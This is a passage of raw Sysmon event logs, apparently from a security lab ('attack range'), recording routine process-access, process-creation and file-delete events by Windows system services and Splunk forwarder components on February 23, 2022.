ystem32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215445Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:49.338{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215444Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:49.338{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215443Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:49.338{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-0FE5-6216-2A04-000000003902}3312C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215442Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:49.338{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0FE5-6216-2A04-000000003902}3312C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215441Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:49.339{4F8D34B0-0FE5-6216-2A04-000000003902}3312C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000215471Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:50.666{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD31AB750CEAD568B7B073ED2BC92D91,SHA256=4D37E22F4D6F97E1D8A3DF32A2DD11B5C7341BDB475A8BBEFA39840DEE091AD7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286484Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:50.310{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C995C51FA89F3A8FC140D1633C1990C0,SHA256=41DE5C1E90DEED721F6C3419ACACE5EBB62C03337063659B5F6E0AD701EF9EBD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215470Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:50.354{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6BA319EC9224A054704564DA13079C90,SHA256=5C7F6FBA6C6FF4D23706C2B63631C178A2DC4B8470EB43DB0004AAE7DB1B0C59,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215469Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:50.214{4F8D34B0-0FE6-6216-2B04-000000003902}33042392C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215468Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:50.010{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0FE6-6216-2B04-000000003902}3304C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215467Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:50.010{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215466Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:50.010{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215465Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:50.010{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215464Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:50.010{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215463Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:50.010{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215462Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:50.010{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215461Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:50.010{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215460Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:50.010{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215459Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:50.010{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215458Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:50.010{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-0FE6-6216-2B04-000000003902}3304C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215457Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:50.010{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0FE6-6216-2B04-000000003902}3304C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215456Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:50.011{4F8D34B0-0FE6-6216-2B04-000000003902}3304C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000215485Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:51.776{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9F6F5EF645E39C7F9A50CBDEB20707C,SHA256=7A7B0E4078FF057BB049003651A49243C6547D3655F5CDA469EC145507876739,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286485Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:51.357{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=500918DC83545C60F5EFCE6232005BEA,SHA256=947C7B5FD737967BC873DFCF1928BED68C9361D34192CC966310C6CDADE6A09D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215484Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:51.526{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0FE7-6216-2C04-000000003902}2756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215483Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:51.526{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215482Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:51.526{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215481Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:51.526{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215480Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:51.526{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215479Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 